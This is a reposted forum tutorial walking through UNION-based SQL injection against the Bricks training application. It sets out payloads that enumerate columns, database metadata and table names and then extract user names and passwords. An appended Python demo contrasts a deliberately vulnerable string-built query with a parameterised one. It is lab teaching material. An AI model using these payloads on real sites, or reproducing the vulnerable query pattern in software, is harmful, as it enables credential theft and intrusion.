Author: Croot
Time:2015-06-02,19:02:11
Links:http://bbs.pediy.com/showthread.php?t=201147
/*
*author:croot
*source:http://croot.cf/helloword/239.html
*date:2015-06-02
*/
Url:bricks/content-1/index.php?id=0
SQL Query:select * from users WHERE idusers=0 LIMIT 1
The id parameter here can be changed in the browser's URL, and a different value produces different output.
Url:bricks/content-1/index.php?id=1
SQL Query:select * from users WHERE idusers=1 LIMIT 1
This time the page displays the content of another user. Since the id parameter is accepted as input, it is an interesting starting point for testing. The first step is to check whether it is susceptible to SQL injection.
Url:bricks/content-1/index.php?id=0'
SQL Query:select * from users WHERE idusers=0' LIMIT 1
The page shows no content, but it does display an error message. This means the id parameter is an injection point: our input is inserted into the query and can change what it does. The injected code must be inserted in a way that keeps the full SQL statement syntactically valid. The next step is to use well-constructed SQL to confirm that the vulnerability exists.
Url:bricks/content-1/index.php?id=0 and 1=1
SQL Query:select * from users WHERE idusers=0 and 1=1 LIMIT 1
The page now displays no error, because the added condition evaluates to true. What if the added condition evaluates to something other than true?
Url:bricks/content-1/index.php?id=0 and 1=2
SQL Query:select * from users WHERE idusers=0 and 1=2 LIMIT 1
Since the injected condition always evaluates to false, the page no longer displays any content and only shows the error message. This proves that injected SQL is actually executed through the id parameter.
The injected code can be modified further to perform more advanced operations, including reading, deleting and altering important information. At this stage, however, nothing is known about the database, its version, tables, columns, etc., so these details must be enumerated first. Enumerating the number of columns in the current query is a relatively simple task.
Url:bricks/content-1/index.php?id=0 ORDER BY 1
SQL Query:select * from users WHERE idusers=0 ORDER BY 1 LIMIT 1
The page displays without any problems, and no error message appears.
Url:bricks/content-1/index.php?id=0 ORDER BY 2
SQL Query:select * from users WHERE idusers=0 ORDER BY 2 LIMIT 1
The page still displays without problems or errors, which proves that there are at least 2 columns.
Url:bricks/content-1/index.php?id=0 ORDER BY 3
SQL Query:select * from users WHERE idusers=0 ORDER BY 3 LIMIT 1
The page still displays without problems or errors, so there are at least three columns.
This process continues, increasing the ORDER BY value, until the page display changes.
Url:bricks/content-1/index.php?id=0 ORDER BY 8
SQL Query:select * from users WHERE idusers=0 ORDER BY 8 LIMIT 1
The page still displays without problems or errors, so there are at least eight columns.
Url:bricks/content-1/index.php?id=0 ORDER BY 9
SQL Query:select * from users WHERE idusers=0 ORDER BY 9 LIMIT 1
This page shows an error, so the ninth column does not exist. This confirms that the query has exactly 8 columns.
A UNION SELECT statement is now used to find which of the 8 columns are displayed on the page.
Url:bricks/content-1/index.php?id=0 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1
This page shows neither any special information nor the normal content. This is because the page only displays the first row of the query results. A small modification of the injected code is needed to make the second row the one that is displayed. There are many ways to do this.
url:bricks/content-1/index.php?id=99999 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=99999 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1
In this scenario it is assumed that the database stores fewer than 99999 users. Since no user has ID 99999, the first row is empty and the second row (from the UNION) becomes the result. The changed output is then displayed on the page.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1
Making the first part of the query return nothing has the same effect.
In both cases, some of the numbers appear on the page in place of the actual user information. The columns corresponding to these numbers are displayed on the page and can be used to read data out.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT user(),2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT user(),2,3,4,5,6,7,8 LIMIT 1
The first number is replaced with the name of the current database user, in user@host form.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT version(),2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT version(),2,3,4,5,6,7,8 LIMIT 1
This will help us get the version of the database.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT database(),2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT database(),2,3,4,5,6,7,8 LIMIT 1
The name of the current database is displayed: bricks. Now the tables of the current database must be enumerated.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema='bricks'
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from information_schema.tables where table_schema='bricks' LIMIT 1
Because there is only one table in the bricks database, its name is displayed. The next step is to get the columns of the users table.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 0,1--
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 0,1-- LIMIT 1
idusers is the name of the first column of the users table. Without the comment, two LIMIT clauses would appear in the executed query, which would cause a syntax error. To avoid this, a -- comment is added immediately after the injected LIMIT clause so that the rest of the original query is commented out.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 1,1--
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users' LIMIT 1,1-- LIMIT 1
name is the second column of the users table.
This process continues up to LIMIT 7,1 (the table has 8 columns and the offset starts at 0). At the end of it, all the column names have been collected: idusers, name, email, password, ua, ref, host, lang. The name and password columns are the most interesting ones, so the next step is to read the data in these columns through the injected statement.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat(name,char(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1--
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT concat(name,char(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 0,1-- LIMIT 1
This gets the first user name and password in the users table. char(32) is a space, which makes the user name and the password easy to tell apart.
Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat(name,char(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 1,1--
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT concat(name,char(32),password),2,3,4,5,6,7,8 from bricks.users LIMIT 1,1-- LIMIT 1
This gets the second user name and password in the users table. The process continues until all user names and passwords in the table have been retrieved.
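The following is an added example, not code from the Bricks project or from the original post. It rebuilds the walkthrough's three observable page states (error message, a user displayed, nothing displayed) against an in-memory SQLite database that stands in for MySQL: the table schema and the two rows are constructed for the example, and SQLite lacks user(), version() and information_schema, so those steps are not reproduced. vulnerable_lookup builds the query exactly the way the "SQL Query" lines above show, and safe_lookup is the hardened form (integer validation plus a bound parameter) that makes every probe on the page return the "empty" state instead of executing attacker-controlled SQL.

```python
import sqlite3

# Constructed stand-in for the Bricks `users` table: 8 columns with the names the
# page enumerates. The rows are made up for this example, not Bricks data.
SCHEMA = """
CREATE TABLE users (
    idusers INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT,
    ua TEXT, ref TEXT, host TEXT, lang TEXT
);
"""
ROWS = [
    (0, "tom", "tom@example.test", "tom-secret", "ua0", "ref0", "host0", "en"),
    (1, "jerry", "jerry@example.test", "jerry-secret", "ua1", "ref1", "host1", "en"),
]


def make_db():
    """Build the in-memory SQLite database (an assumption standing in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?,?,?,?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_id):
    """The pattern the page exploits: the id parameter is pasted into the SQL text,
    so the executed query is exactly the 'SQL Query' line shown for each URL."""
    sql = f"select * from users WHERE idusers={user_id} LIMIT 1"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, user_id):
    """Hardened version: validate the type, then bind the value as a parameter.
    Anything that is not an integer never reaches the SQL engine at all."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "select * from users WHERE idusers=? LIMIT 1", (numeric_id,)
    ).fetchone()


def observe(conn, lookup, user_id):
    """Map a lookup to the three page states the walkthrough distinguishes:
    'error' (an error message), 'row' (a user is displayed), 'empty' (nothing)."""
    try:
        row = lookup(conn, user_id)
    except sqlite3.Error:
        return "error", None
    return ("row", row) if row is not None else ("empty", None)


def count_columns(conn, lookup):
    """The page's ORDER BY probe: raise n until ORDER BY n no longer yields a row.
    Against the hardened lookup every probe is rejected, so the count stays 0."""
    n = 0
    while n < 64:  # upper bound so a lookup that never errors cannot loop forever
        state, _ = observe(conn, lookup, f"0 ORDER BY {n + 1}")
        if state != "row":
            break
        n += 1
    return n


if __name__ == "__main__":
    db = make_db()
    probes = ("0", "1", "0'", "0 and 1=1", "0 and 1=2",
              "0 and 1=2 UNION SELECT 'probe',2,3,4,5,6,7,8")
    for probe in probes:
        vuln = observe(db, vulnerable_lookup, probe)[0]
        safe = observe(db, safe_lookup, probe)[0]
        print(f"{probe!r:50} vulnerable={vuln:5} hardened={safe}")
    print("columns found via ORDER BY (vulnerable):", count_columns(db, vulnerable_lookup))
    print("columns found via ORDER BY (hardened):  ", count_columns(db, safe_lookup))
```

The table output makes the page's reasoning visible in one run: `0'` errors, `0 and 1=1` shows a user, `0 and 1=2` shows nothing, and the UNION row comes back with the attacker's marker in the displayed column, while the same inputs against safe_lookup all collapse to "empty" because the id never reaches the query as SQL text.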
Reference: http://sechow.com/bricks/docs/content-page-1.html
Reproduced from the Kanxue (pediy.com) forum.